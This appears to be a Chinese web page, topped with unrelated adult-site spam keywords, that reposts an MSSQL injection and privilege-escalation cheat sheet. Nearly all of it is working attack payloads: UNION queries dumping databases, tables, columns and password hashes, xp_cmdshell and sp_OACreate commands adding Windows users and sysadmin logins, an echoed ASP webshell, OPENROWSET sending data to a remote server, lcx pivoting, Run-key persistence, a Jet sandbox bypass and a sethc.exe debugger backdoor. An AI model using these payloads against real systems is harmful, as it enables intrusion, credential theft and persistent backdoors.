人妻av在线免费看,黄色第一成人免费网站

菲哥哥注入語句筆記是一款sql注入工具，它可以注入一些要注意的東西，Sql注射經(jīng)驗(yàn)，寫成筆記了。

sql注入工具(菲哥哥注入語句筆記)功能介紹：

1.爆所有庫名

+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases

//name數(shù)據(jù)庫名 filename 數(shù)據(jù)庫物理路徑

+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0

//爆破數(shù)據(jù)庫路徑換dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–

and 0<>db_name(n)–

n改成0,1,2,3……就可以跨庫

2.爆所有表名

+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–

//table_catalo 保存當(dāng)前數(shù)據(jù)庫名稱，table_name 保存當(dāng)前數(shù)據(jù)庫中所有表

+select+name,id,crdate,4,5+from+數(shù)據(jù)庫名.dbo.sysobjects+where+xtype=’u.+and+status>=0–

// name表名 id表的id xtype=’u’ u代表用戶自定義的表 crdate為數(shù)據(jù)庫的創(chuàng)建時(shí)間 ststus>=0

/+union+select+name,object_id,3,4,5+from sys.tables–

3.爆所有字段名

+union+select+name,id,3,4,5+from+數(shù)據(jù)庫名稱.dbo.syscolumns+where+xtype=167+and+id=5575058–

// id是在爆破表名時(shí)候的id值 syscolumns中的id和 sysobjects中的id主外鍵關(guān)系

+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0

//查詢含有 “pass”的字段

+union+SELECT name,2,3,4,5 FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ‘yixiang_bizre’)

//查詢 yixiang_bizre 表中的所有字段

+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–

//table_name表名稱 column_name字段名

4.添加用戶

1、declare @o int;

2、exec master..sp_oacreate 'Shell.Application',@o out;

3、exec master..sp_oamethod @o,'ShellExecute',NULL,'cmd.exe','/c net user fuck fuck /add

5.判斷是不是SQL庫

and exists（select * from sysobjects）

6.所有賬戶名

+union+select+(select name+’||’+password_hash from+sys.sql_logins for xml path),2,3,4,5+from+sys.sql_logins //

7.加SQL賬戶

1、--創(chuàng)建個(gè)登陸mssql的帳號(hào)

2、;exec master.dbo.sp_addlogin name,pass;--

3、--把創(chuàng)建的mssql登陸帳號(hào)提升到sysadmin

4、;exec master.dbo.sp_addsrvrolemember name,sysadmin;--

8.啟動(dòng)組寫入命令行和執(zhí)行

EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,’help1′,’REG_SZ’,’cmd.exe /c net user test ptlove /add’-

9.LCX語句

;exec master..xp_cmdshell ‘D:\m目錄\lcx.exe -slave 本機(jī)ip 51 目標(biāo)內(nèi)網(wǎng)ip 3389′–

//目標(biāo)機(jī)器執(zhí)行

lcx.exe -listen 51 2007

//本機(jī)執(zhí)行連接本機(jī)的的2007端口就可以了

10.win200爆目錄

xp_regread讀取HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots–

//獲取WEB路徑

11.恢復(fù)xp_cmdshell

;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’,’e:\inetpub\wwwroot\xplog70.dll’

//把xplog70.dll文件給他上傳到e:\inetpub\wwwroot目錄下了

12.open數(shù)據(jù)

insert into OPENROWSET(‘SQLOLEDB’, ‘server=ip; uid=user;pwd=123456!’, ‘select c from cmd’) select username from test

//把 test是本地表，中username的值插入到遠(yuǎn)程cmd表中的c字段里

13.判斷權(quán)限

1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--

2、//sa權(quán)限

3、and (select IS_MEMBER('db_owner'))=1-- // dbo

4、and (select IS_MEMBER('public'))=1-- //public

14.DIR目錄

遍歷系統(tǒng)的目錄結(jié)構(gòu)，分析結(jié)果并發(fā)現(xiàn)WEB虛擬目錄，先創(chuàng)建一個(gè)臨時(shí)表：

temp http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));

–接下來：我們可以利用xp_availablemedia來獲得當(dāng)前所有驅(qū)動(dòng)器,并存入temp表中：http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;–? 我們可以通過查詢temp的內(nèi)容來獲得驅(qū)動(dòng)器列表及相關(guān)信息或者利用xp_subdirs獲得子目錄列表,并存入temp表中：http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;–?

我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中：http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;–

這樣就可以成功的瀏覽到所有的目錄（文件夾）列表? 如果我們需要查看某個(gè)文件的內(nèi)容，可以通過執(zhí)行xp_cmdsell：;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;–?

使用’bulk insert’語法可以將一個(gè)文本文件插入到一個(gè)臨時(shí)表中。

如：bulk insert temp(id) from ‘c:\inetpub\wwwroot\index.asp’ 瀏覽temp就可以看到index.asp文件的內(nèi)容了！通過分析各種ASP文件，可以得到大量系統(tǒng)信息，WEB建設(shè)與管理信息，甚至可以得到SA帳號(hào)的連接密碼。

15.判斷站庫分離

+and+host_name()==@@servername-- //判斷站庫是否分離

16.存儲(chǔ)總結(jié)

xp_availablemedia 顯示系統(tǒng)上可用的盤符’C:’ xp_availablemedia

xp_enumgroups 列出當(dāng)前系統(tǒng)的使用群組及其說明 xp_enumgroups

xp_enumdsn 列出系統(tǒng)上已經(jīng)設(shè)置好的ODBC數(shù)據(jù)源名稱 xp_enumdsn

xp_dirtree 顯示某個(gè)目錄下的子目錄與文件架構(gòu) xp_dirtree ‘C:\inetpub\wwwroot\’

xp_getfiledetails 獲取某文件的相關(guān)屬性 xp_getfiledetails ‘C:\inetpub\wwwroot.asp’

dbp.xp_makecab 將目標(biāo)計(jì)算機(jī)多個(gè)檔案壓縮到某個(gè)檔案里所壓縮的檔案都可以接在參數(shù)的后面用豆號(hào)隔開

dbp.xp_makecab’C:\lin.cab’,’evil’,1,’C:\inetpub\mdb.asp’

xp_unpackcab 解壓縮 xp_unpackcab ‘C:\hackway.cab’,’C:\temp’,1

xp_ntsec_enumdomains 列出服務(wù)器域名 xp_ntsec_enumdomains

xp_servicecontrol 停止或者啟動(dòng)某個(gè)服務(wù) xp_servicecontrol ‘stop’,’schedule’

xp_terminate_process 用pid來停止某個(gè)執(zhí)行中的程序 xp_terminate_process 123

dbo.xp_subdirs 只列某個(gè)目錄下的子目錄 dbo.xp_subdirs ‘C:’

17.判斷xp_cmdshell

+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+= ‘X’+AND+name+= ‘xp_cmdshell’)

18.判斷系統(tǒng)為win2003

And+charindex('5.3',@@verisdn)

19.echo 寫shell

;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("^)^</script^> >c:\\mu.asp'-

20.停掉服務(wù)

exec master..xp_servicecontrol ‘stop’,’schedule’

exec master..xp_servicecontrol ‘start’,’schedule’

有多少刪減。另外添加幾句個(gè)人經(jīng)常用到的SQL注入和提權(quán)的語句

當(dāng)xp_cmshell被刪除或者無法使用的情況，我們不妨試試?yán)肧P_OACreate和SP_OAMETHOD調(diào)用系統(tǒng)wscript.shell執(zhí)行系統(tǒng)命令。

Declare @runshell INT

Exec SP_OACreate ‘wscript.shell’,@runshell out

Exec SP_OAMeTHOD @runshell,’run’,null,’net user lengf lengf /add’

當(dāng)這些都失敗了，試試關(guān)閉系統(tǒng)沙盒模式，它在注冊表的位置是

HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\Engine\SandBoxMode

默認(rèn)鍵值為2，即只在Access的模式下開啟沙盒模式，對應(yīng)的鍵值是

0 — 在任何所有者中禁止啟用安全模式

1 –為僅在允許范圍內(nèi)

2 –必須在access模式下

3 –完全開啟

我們要將其設(shè)置為0就可以關(guān)閉了，通過SQL語句實(shí)現(xiàn)

Exec master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE,’\Software\Microsoft\Jet\4.0\Engine\’,’SandBoxMode’,’REG_DWORD’,0

執(zhí)行關(guān)閉成功后就可以執(zhí)行系統(tǒng)命令

select * from OpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:\windows\system32\ias\ias.mdb’,’select shell(“net user lengf lengf /add”)’)

上面是提權(quán)思路。另外提下兩種備份：

(1)Log備份(hta)

alert database [dbname] set RECOVERY FULL–

create table cmd(a image)–

backup log [dbname] to disk=’c:\hta’ with init–

insert into cmd(a) values(‘[command]‘)–

backup log [dbname] to disk=’系統(tǒng)啟動(dòng)目錄\hello.hta’–

drop table cmd–

(2)差異備份

backup database [dbname] to disk=’c:\db.bak’–

create table cmd(cmd image)–

insert into cmd(cmd) values(‘[command]‘)–

backup database [dbname] to disk=’系統(tǒng)啟動(dòng)目錄\hello.hta’ WITH DIFFERENTIAL FORMAT–

drop table cmd–

經(jīng)驗(yàn)告訴我，將你要執(zhí)行的command轉(zhuǎn)換成十六進(jìn)制成功率會(huì)比較高，但是這個(gè)比較被動(dòng)。

另外就是可以通過注冊表添加run啟動(dòng)項(xiàng)添加用戶命令，這種也是被動(dòng)，要等服務(wù)器重啟。

看了這個(gè)工具，覺得還缺少一個(gè)很使用的方法，那就是映像劫持，位于注冊表位置：

HKEY_LOACAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

在這個(gè)鍵下面有一個(gè)Debugger的參數(shù)，如果不為空，就會(huì)處理。添加映像劫持方法的SQL語句如下：

exec Master.dbo.xp_regWrite ‘HKEY_LOACAL_MACHINE’,’Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe’,’debugger’,’REG_SZ’,’c:\windows\system32\cmd.exe’